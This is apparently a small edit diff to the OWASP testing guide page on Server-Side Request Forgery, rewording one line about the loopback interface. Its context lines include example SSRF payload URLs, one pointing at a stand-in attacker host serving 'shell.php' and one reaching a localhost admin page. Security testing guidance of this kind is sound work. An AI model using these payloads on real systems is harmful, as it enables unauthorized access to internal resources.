OWASP/wstg/Testing_for_Server-Side_Request_Forgery.md

 `https://example.com/page?page=https://malicioussite.com/shell.php`

-Use the localhost/loopback interface to access content restricted to the host only.
+Use the loopback interface to access content restricted to the host only.
 This mechanism implies that if you have access to the host then you have enough privileges to directly access the `admin` page.
 These kind of trust relationships, where requests originating from the local machine are handled differently than ordinary requests, are often what makes SSRF into a critical vulnerability.

 `https://example.com/page?page=http://localhost/admin`